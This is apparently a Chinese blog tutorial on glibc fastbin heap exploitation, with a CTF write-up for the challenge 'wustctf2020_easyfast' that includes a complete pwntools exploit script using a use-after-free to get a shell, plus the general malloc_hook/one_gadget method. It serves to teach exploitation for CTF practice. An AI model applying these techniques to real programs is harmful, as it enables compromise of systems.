fastbin attack快速入门

最新推荐文章于 2024-03-31 09:32:53 发布
最新推荐文章于 2024-03-31 09:32:53 发布
阅读量1.1k 收藏 2
点赞数 3
分类专栏: CTF PWN 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/abel_big_xu/article/details/109658346
版权
CTF 同时被 2 个专栏收录
23 篇文章 2 订阅
订阅专栏
PWN
14 篇文章 1 订阅
订阅专栏

0x01 fastbin简介

Fastbin包含0x20~0x80大小bin的数组指针,用于快速分配小堆块。fastbin按照单链表结构进行组织,相同大小的bin在同一个链表中,fd指向下一个bin,采用LIFO(Last In First Out)机制。在fastbin中,堆块的inuse标志都为1,处于占用状态,防止chunk释放时进行合并,加快小堆块的分配。

正常fastbin的使用

通过这个简单的案例来了解fastbin的单链表结构,malloc和free的过程。

#include<stdio.h>
int main(void)
{
    void *chunk1,*chunk2,*chunk3;
    chunk1=malloc(0x30);
    chunk2=malloc(0x30);
    chunk3=malloc(0x30);
    //进行释放
    free(chunk1);
    free(chunk2);
    free(chunk3);
    //重新获取
    malloc(0x30);
    return 0;
}

3次malloc之后堆的分布情况
在这里插入图片描述
3次free(chunk1,chunk2,chunk3)之后堆和fastbin单链表的情况。可以看到确实是一个单链表的结构,chunk->bk不会被设置,inuse位也不会因为释放而改变。
在这里插入图片描述
重新申请0x30大小的堆块。先被获取的是0x602080也就是最后一个被释放的chunk。
在这里插入图片描述

0x02攻击方式

1.fastbin double free(绕过free检查)

同一个fastbin被多次释放。Fastbin Double Free 能够成功利用主要有两部分的原因

  1. fastbin被释放以后inuse位不会被置0
  2. fastbin 在执行 free 的时候仅验证了 main_arena 直接指向的块。对于链表后面的块,并没有进行验证。

最简单的fastbin double free如下

#include<stdio.h>
int main(void)
{
    void *chunk1,*chunk2,*chunk3;
    chunk1=malloc(0x10);
    chunk2=malloc(0x10);

    free(chunk1);
    free(chunk2);
    free(chunk1);
    return 0;
}

两次malloc(0x10)之后堆块中分配了两个chunk
在这里插入图片描述
下面对chunk1进行double free。chunk1->fd指向chunk2,chunk2->fd指向chunk1。
利用方法:

  1. 申请0x20堆块(0x602000),此时可以修改fd为我们需要修改的地址fakechunk_addr,如malloc_hook-0x23。此时0x20的fastbinsY已经指向了0x602020
  2. 申请0x20堆块(0x602000)
  3. 申请0x20堆块(0x602000),此时0x20的fastbinsY指向了fakechunk_addr
  4. 再次申请0x20堆块,此时如果通过了检查就能分配到fakechunk

在这里插入图片描述

2. house of spirit?Alloc to stack?Arbitrary Alloc(绕过malloc检查)

主要是针对fastbin的单链结构,覆盖fastbin的fd为 fakefastbin的地址,使之后要分配的fastbin为fakfastbin。同时fakefastbin还要绕过chunk大小检查,在将chunk分配之前会检查fakefastbin的size是否和同一条链上的其他chunk大小相同。

 /*
     If the size qualifies as a fastbin, first check corresponding bin.
     This code is safe to execute even if av is not yet initialized, so we
     can try it without checking, which saves some time on this fast path.
   */

  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
    {
      idx = fastbin_index (nb);
      mfastbinptr *fb = &fastbin (av, idx);
      mchunkptr pp = *fb;
      do
        {
          victim = pp;
          if (victim == NULL)
            break;
        }
      while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim))
             != victim);
      if (victim != 0)
        {
        //这里检查获得chunk的size是否属于这条fastbinY
          if (__builtin_expect (fastbin_index (chunksize (victim)) != idx, 0))
            {
              errstr = "malloc(): memory corruption (fast)";
            errout:
              malloc_printerr (check_action, errstr, chunk2mem (victim), av);
              return NULL;
            }
          check_remalloced_chunk (av, victim, nb);
          void *p = chunk2mem (victim);
          alloc_perturb (p, bytes);
          return p;
        }
    }

在不同的地方构造fakefastbin可以达到不同的效果

  1. 在栈上伪造fastchunk,覆盖返回地址
  2. 在bss上伪造fastchunk,修改全局变量
  3. 在堆上伪造fastchunk,修改堆上数据

小技巧
malloc一个大小在0x70 ~ 0x80之间的堆块,进行free时堆块会进入0x70 ~ 0x80大小的单向链表。由于系统中0x7f这样的数值比较好找,所以能够构造0x7f(比如malloc_hook - 0x23地址)这样的数值来绕过上面的检测

在这里插入图片描述

0x03 例题wustctf2020_easyfast

调试小技巧:因为程序设置了alarm,不方便我们调试查看。我们可以用ida将这两条命令用nop填充。
在这里插入图片描述

1.查看程序保护

可以修改GOT表,没有PIE。
在这里插入图片描述
试运行程序,应该是菜单题。
在这里插入图片描述

2.分析程序

选项1是add函数添加note。选项2是delete函数删除note。选项3是edit函数写note。选项4是backdoor后门函数。

在这里插入图片描述
add函数
最大可申请0x78大小chunk,也就是说只能申请fastbin,并将申请的chunk记录在bss的heap数组中。
在这里插入图片描述
delete函数(有漏洞)
输入index之后,将对应的chunk释放。问题是没有将heap数组置0,可能存在uaf。
在这里插入图片描述
edit函数
只能读入8个字节。所以没法通过修改fd来fastbin attack修改malloc_hook
在这里插入图片描述
backdoor函数
只要能够设置0x602090=0即可getshell。这样的话,题目已经在明示我们用fastbin attack来修改这个值。且明显fakefastbin的size为0x50。
在这里插入图片描述
在这里插入图片描述

3.利用方法

基本思路就是通过fastbin attack在0x602090分配chunk,修改1为0,最后直接调用backdoor来getshell

  1. add一个0x40大小chunk
  2. free刚创建的chunk
  3. 由于UAF漏洞,修改chunk的fd为0x602080
  4. 再创建两个0x40大小的chunk
  5. 将刚0x602090内容修改为0
  6. 触发getshell

构造fastbin attack
执行完上面的步骤1,2,3之后。可以看到0x50大小fastbin链中已经存在0x602080。接下去只要创建两次0x40大小的chunk,就能得到0x602080位置的chunk.

add(0x40)#0
delete(0)
edit(0,p64(0x602080))#fastbin attack

在这里插入图片描述
修改0x602090
红框是heap数组,可以看到heap[2]指向了0x602090,再调用edit函数修改内容为0即可

add(0x40)#1
add(0x40)#2
edit(2,p64(0))

在这里插入图片描述
getshell
调用backdoor()来getshell

backdoor()
p.interactive()

4. exp

from pwn import *
context.arch = 'amd64'
debug = 1

if debug:
	context.log_level='debug'
	context.terminal = ['terminator','-x','sh','-c']
	p = process('./wustctf2020_easyfast')
	elf = ELF('./wustctf2020_easyfast')
	libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
else:
	p = remote('node3.buuoj.cn',26554)
	elf = ELF('./wustctf2020_easyfast')
	libc = ELF('/home/abel/pwn/libc/u16/x64libc-2.23.so')


def add(size):
	p.sendlineafter('choice>','1')
	p.sendlineafter('size>',str(size))


def delete(idx):
	p.sendlineafter('choice>','2')
	p.sendlineafter('index>',str(idx))


def edit(idx,content):
	p.sendlineafter('choice>','3')
	p.sendlineafter('index>',str(idx))
	p.send(content)


def backdoor():
	p.sendlineafter('choice>','4')


add(0x40)#0
delete(0)
edit(0,p64(0x602080))#fastbin attack
add(0x40)#1
add(0x40)#2

edit(2,p64(0))

backdoor()
p.interactive()

0x04 总结

一般情况下,我们会创建0x70的chunk,利用double free或者UAF漏洞将chunk的fd修改为malloc_hook-0x23,使得能够申请到malloc_hook附近。将malloc_hook覆盖为one_gadget。当malloc_hook不为0时,执行malloc之前会先执行malloc_hook地址保存的函数地址。如果所有的one_gadget都失效了,可以将malloc_hook覆盖为realloc_hook+n地址跳过最前面的push指令来调整rsp,再将realloc_hook覆盖为one_gadget。
一般套路

  1. 利用漏洞修改0x70大小fastbin链条中某个bin的fd为malloc_hook-0x23 (值为0x7F可以绕过分配时的size检查)
  2. 多次分配得到目标chunk,修改malloc_hook为one_gadget
  3. 如果不成功可以参考下面链接调整rsp

参考链接:
onegadget不起作用
CTFwiki

努力学习的大康
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
强网杯:简单的UAF,fastbin attack打全局list,然后任意地址读写.zip
12-18
3. **Fastbin**:在glibc的`malloc`实现中,Fastbin是一种用于快速回收和重新分配小内存块的数据结构。当内存块释放后,它会被添加到对应大小的Fastbin链表中。 4. **Fastbin Attack**:攻击者可以通过精心设计的...
堆机制利用之fastbin
weixin_48066554的博客
05-04 2300
堆机制利用之fastbin 前半部分:基于libc2.23(无tcache) 堆机制(fastbin等) 想要了解堆的机制利用方法必须要先了解堆的基本机制以及结构 目前主要使用的内存管理库是ptmalloc,而在ptmalloc中,用户请求的空间由名为chunk的数据结构表示 下面就是一个标准的chunk结构 该chunk中,**prev_size参数为前一chunk(如果未被使用)的大小,size参数为该chunk的大小,而P参数(pre_insue)为标志位,标志前一个chunk的使用情况。**而上述
fastbin attack
m0_64195960的博客
07-19 1404
FastbinDoubleFree是指fastbin的chunk可以被多次释放,因此可以在fastbin链表中存在多次。这样导致的后果是多次分配可以从fastbin链表中取出同一个堆块,相当于多个指针指向同一个堆块,结合堆块的数据内容可以实现类似于类型混淆(typeconfused)的效果。FastbinDoubleFree能够成功利用主要有两部分的原因fastbin的堆块被释放后next_chunk的pre_inuse位不会被清空1.1.1该技术的核心。......
堆漏洞挖掘中的bins分类(fastbin、unsorted bin、small bin、large bin)
董哥的黑板报
07-23 1万+
一、bin链的介绍 bin是一个由struct chunk结构体组成的链表 前面介绍过,不同的chunk根据特点不同分为不同的chunk,为了将这些chunk进行分类的管理,glibc采用了bin链这种方式管理不同的chunk 不同的bin链是由arena管理的 bin链中的chunk均为free chunk 二、bin链分类 根据bin链成员的大小不同,分为以下几类: fast bi...
linux适当堆内存,linux堆内存漏洞利用之fastbin
weixin_42245967的博客
04-30 387
背景介绍在前一节主要介绍了Glibc的堆内存管理的机制,在上一节的基础上,我打算介绍一下针对Glibc堆内存管理的攻击。此系列我打算按攻击面是哪一个bin来展开,主要分为:fastbin的攻击smallbin的攻击largebin的攻击unsorted bin的攻击top chunk的攻击本文主要介绍fastbin的攻击fastbin漏洞利用具体的fastbin的介绍请参考前一节和 Linux堆内...
[pwn]堆:fastbin attack详解
热门推荐
Breeze的博客
12-31 1万+
[pwn]fastbin attack 文章目录[pwn]fastbin attackfastbin attack原理double freeuse after freechunk extend需要注意的点:0ctf:babyheap fastbin attack原理 fastbin attack是利用fastbin分配原理的漏洞,利用要求是我们能够修改“已释放”堆块。通常情况下与double fr...
TANK ATTACK声卡驱动
12-28
TANK ATTACK声卡驱动最新版ASIO驱动,支持某宝198的双通道吉他声卡,内含2.8.47和2.9.15两个版本,分别都有32bit和64bit版本,自己根据需要安装。2.8.47版本比较稳定一点,直接安装就好,不需要注册码。
Attack_Http.rar_http attack下载
09-14
标题中的"Attack_Http.rar_http attack下载"暗示了这是一个关于HTTP攻击的资源包,其中可能包含了一个用于模拟或分析HTTP攻击的程序。描述中的"Http thread server request"提示我们,这个程序可能涉及到多线程HTTP...
机器学习Attack and Defense.pdf
01-16
《机器学习Attack and Defense》是李宏毅教授关于机器学习安全性的讲解,主要探讨了如何构建鲁棒的机器学习模型,防止模型被恶意攻击。在实际应用中,仅仅让机器学习分类器在大部分时间工作是不够的,我们需要的是...
wireless attack python
09-12
wireless attack python(英文版)
探索Fastbin:一款高效的C语言内存管理工具
最新发布
gitblog_00077的博客
03-31 324
探索Fastbin:一款高效的C语言内存管理工具 项目地址:https://gitcode.com/funny/fastbin 项目简介 Fastbin 是一个轻量级、快速且灵活的C语言内存管理系统,旨在提升你的程序在内存分配和释放时的效率。它的设计灵感来源于现代操作系统的内存管理策略,尤其是对小块内存的处理,使得开发者能够在不牺牲性能的前提下,更好地管理程序的内存。 技术分析 Fastbin的核...
【堆漏洞 - Fastbin attack
m0_52343643的博客
04-06 279
漏洞发生于fastbin的chunk,且存在堆溢出、use-after-free 等能控制 chunk 内容的漏洞。
0ctfbabyheap2017WP——堆溢出fastbin attack初探
GeekCmore的博客
02-18 513
从栈溢出进入堆溢出,漏洞利用的复杂度上了一个大台阶,主要是因为 ptmalloc 内存管理器对于堆管理设计了复杂的数据结构和算法,要想进入堆溢出的学习,就必须厘清它们之间的关系。本文将从一个经典的例子——0ctfbabyheap2017 来介绍一个初级的 fastbin attack 以初探堆溢出攻击。
堆漏洞挖掘——fastbin attack漏洞
董哥的黑板报
08-12 3160
一、核心思想 通过fastbins链的管理,达到目标地址(target)读写 二、原理图解 fastbin存储freechunk的单链表结构: fastbins是如何存取fastchunk的,见文章:https://blog.csdn.net/qq_41453285/article/details/97613588 第一步:我们知道被free的chunk会被放入到arena所管理的f...
Fastbin attack
aoque9909的博客
06-25 407
Fastbin Attack 暂时接触到了两种针对堆分配机制中fastbin的攻击方式,double free和house of spirit Double free 基本原理 与uaf是对free之后的指针直接进行操作不同,double free通过利用fastbin对堆的分配机制,改写在fastbin中的chunk,实现对指定内存的堆块分配。 先正常释放chunk1和c...
Linux打印程序的全部fd,Linux堆溢出之Fastbin Attack
weixin_33245968的博客
05-01 126
摘要在近幾年各大CTF比賽中,看到有很多次pwn類別題中出現fastbin攻擊的情況,例如今年的defcon,RCTF,胖哈勃杯,0CTF final等等,fastbin attack是堆漏洞利用中十分常用、易用且有效的一種攻擊方式,在網上的中文資料中,對其原理上進行講述的文章有一些,但詳細講述如何實際利用的完整例子較少,本文將對該利用方式進行簡要原理性闡述,並結合今年Defcon預選賽中的一個實...
babyheap_fastbin_attack
playmaker的博客
06-23 234
babyheap-堆溢出之fastbin_attack 首先检查程序保护 保护全开。是一个选单系统 分析程序 void new() { int index; // [rsp+0h] [rbp-10h] signed int size; // [rsp+4h] [rbp-Ch] void *ptr; // [rsp+8h] [rbp-8h] for ( index = 0; i...
Fastbin的利用
u014377094的博客
03-05 659
我是传送门: pwn_wiki_fastbinattackFastbin Attack - CTF Wiki (ctf-wiki.org) how2heap GitHub - shellphish/how2heap: A repository for learning various heap exploitation techniques. bin结构 struct malloc_chunk { /* #define INTERNAL_SIZE_T size...
CTF PWN Fastbin堆溢出入门
liucc09的博客
12-12 589
目标程序及EXP下载 解题思路 添加新武器时会在偏移52个字节的地方存下上一个武器的内存地址如下: *((_DWORD *)dword_804A288 + 13) = v1; //13个DWORD就是13*4=52字节 输入武器名时存在溢出,因此可以覆盖这个地址,指向另一片内存; 提交订单时会通过单向链表的方式free各个武器的内存区域,由于第1步中可以修改武器链表的上一个武器内存地址,因此可以释放一个我们指定的内存到fastbin中; 我们指定的内存肯定得是我们可以控制的内存,例如程序中的mess
profiled attack
04-27
A profiled attack is a type of cyber attack where the attacker uses information gathered about the target to tailor the attack specifically to that target. This information can include details about ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值